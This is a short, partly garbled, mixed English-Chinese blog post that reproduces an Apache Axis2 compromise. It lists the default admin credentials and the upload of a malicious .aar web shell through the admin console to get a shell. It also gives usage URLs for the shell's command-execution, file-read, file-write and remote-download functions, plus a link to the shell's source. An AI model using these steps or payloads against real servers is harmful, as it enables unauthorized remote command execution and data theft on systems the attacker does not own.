0x00 Preface
Apache Axis2 is a W eb services support the core engine. AXIS2 redesigns and rewrites the old AXIS, and provides development versions in two languages, Java and C.
In fact, AXIS2 not only provides a web service interface for WEB applications, but it can also be viewed as a separate server, and it can be easily integrated with Apache Tomcat . Currently, the latest version of AXIS2 is 1.6.2.
Axis is an open source, XML-based Web service architecture. It was originally developed by IBM, called IBM-SOAP. Later, the Apache Foundation launched AXIS on the basis of SOAP. AXIS is essentially a SOAP engine written in Java language. We can use it to operate and interact with each other in various distributed applications.
0x01 Vulnerability recurrence
Default port: 8089
Default background path: /axis2-admin/login
Default account password: admin/axis2
Select Tools-" Upload Service "to upload the aar package for getshell
After success, it will prompt "File AxisInvoker.aar successfully uploaded"
http://xxx.xxx.xxx.xxx/axis2/services/Cat/exec?cmd=ipconfig
0x02 How to use
How to use horses:
支持的命令:
exec-运行命令,在Linux / Windows上均可使用,不用担心。
http://192.168.56.103:8080/axis2/services/AxisInvoker/exec?cmd=whoami
写-写文件
http://192.168.56.103:8080/axis2/services/AxisInvoker/write?path=c:\1.1txt&content=123
info-显示某些信息,根据需要进行修改
http://192.168.56.103:8080/axis2/services/AxisInvoker/info
读取-读取文件内容
http://192.168.56.103:8080/axis2/services/AxisInvoker/read?path=c:\boot.ini
下载-下载文件并将其保存在某处
http://192.168.56.103:8080/axis2/services/AxisInvoker/download?url=http://www.baidu.com&file=c:\122.txt
Download link: https://github.com/CaledoniaProject/AxisInvoker
Please indicate: Adminxe's Blog » Apache Axis2 background file upload getshell vulnerability reproduction